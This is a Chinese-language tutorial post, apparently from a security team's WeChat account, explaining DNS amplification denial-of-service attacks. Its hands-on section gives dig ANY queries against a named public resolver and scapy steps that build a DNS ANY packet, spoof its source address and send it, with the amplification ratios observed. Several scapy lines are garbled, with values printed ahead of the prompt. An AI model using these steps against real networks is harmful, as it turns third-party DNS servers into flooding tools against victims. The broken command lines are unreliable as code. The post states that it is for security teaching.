拒绝服务——DNS 放大攻击
前言
本节学习DNS 放大攻击
基于UDP
1、简介
DNS 放大攻击
-
基于UDP
-
产生大流量的攻击方法
-
单机的带宽优势
-
巨大单机数量形成的流量汇聚
-
利用协议特性实现放大效果的流量
DNS协议放大效果
-
查询请求流量小,但响应流量可能非常巨大
-
形如
dig ANY hp.com @202.106.0.20 #流量放大约8倍
攻击原理
-
伪造源地址为被攻击目标地址,向大量递归域名查询服务器发起查询
-
DNS服务器成为流量放大和实施攻击者,大量DNS服务器实现DDOS
2、尝试攻击
dig any baidu.com @202.106.0.20 #进行攻击
#发送60字节长度,返回216字节长度
scapy构造数据包
scapy
#构造 IP 数据包 > i=IP()
> i.display()
"202.106.0.20" > i.dst=
> i.display()
#构造 UDP 数据包 > u=UDP()
> u.display()
#构造 DNS 数据包 > d=DNS()
> d.display()
1 > d.rd=
1 > d.qdcount=
> d.display()
#设置查询目标 > q=DNSQR()
> q.display()
'qq.com' > q.qname=
255 #(代表any) > q.qtype=
# 设置目标 > d.qd=q
> d.display()
#拼接数据包 > r=(i/u/d)
> r
> r.display()
> sr1(r)
"192.168.1.110" > i.src=
> r=(i/u/d)
> r.display()
#发送数据包 > send(r)
#发送30字节,回210字节
结语
理解如何将DNS服务器变为帮凶
可参考
https://blog.csdn.net/easylife206/article/details/95560965
https://blog.csdn.net/chenfei_5201213/article/details/7548381
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):拒绝服务——DNS 放大攻击
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论